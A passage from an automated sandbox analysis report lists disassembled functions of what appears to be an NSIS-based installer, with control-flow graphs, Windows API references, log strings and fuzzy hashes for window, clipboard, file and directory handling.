                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                  • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                  • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                                  • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                                                                                                                  Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                                                    • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                  • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                                                  • API String ID: 2110491804-2409696222
                                                                                                                                                                                  • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                  • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                  • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                                                                                                                  Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                                  • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                                  • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                                  • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                  • String ID: @rD
                                                                                                                                                                                  • API String ID: 3282139019-3814967855
                                                                                                                                                                                  • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                  • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                  • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                                                                                                                  Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                  • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                  • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                  • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                  • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                  • BringToFront, xrefs: 004016BD
                                                                                                                                                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                  • Call: %d, xrefs: 0040165A
                                                                                                                                                                                  • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                  • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                  • Jump: %d, xrefs: 00401602
                                                                                                                                                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                  • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                  • API String ID: 2872004960-3619442763
                                                                                                                                                                                  • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                  • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                                                  • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                                                                                                                  Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                  • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                                  • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
